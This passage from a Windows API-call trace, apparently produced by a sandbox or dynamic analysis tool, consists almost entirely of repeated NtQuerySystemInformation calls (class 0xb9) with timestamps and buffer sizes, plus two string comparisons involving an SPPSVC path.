SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0241.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0241.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0241.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0241.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0241.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0241.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0241.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0241.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0241.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0241.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0241.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0241.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0241.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0241.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0241.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0241.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0241.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0241.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0241.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0241.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e820, Length=0x20, ResultLength=0x0) [0241.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0241.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0241.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0241.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0241.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0241.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0241.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0241.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0241.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0241.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0241.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0241.040] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0241.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0241.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0241.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0241.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0241.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0241.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0241.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0241.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0241.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0241.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0241.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0241.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0241.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0241.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0241.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0241.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0241.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0241.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0241.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0241.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0241.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0241.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0241.049] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0241.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0241.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0241.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0241.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0241.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0241.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0241.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0241.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0241.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0241.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0241.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0241.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0241.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0241.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0241.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0241.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0241.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0241.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0241.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0241.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0241.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.060] NtQuerySystemInformation (SystemInformationClass=0xb9, 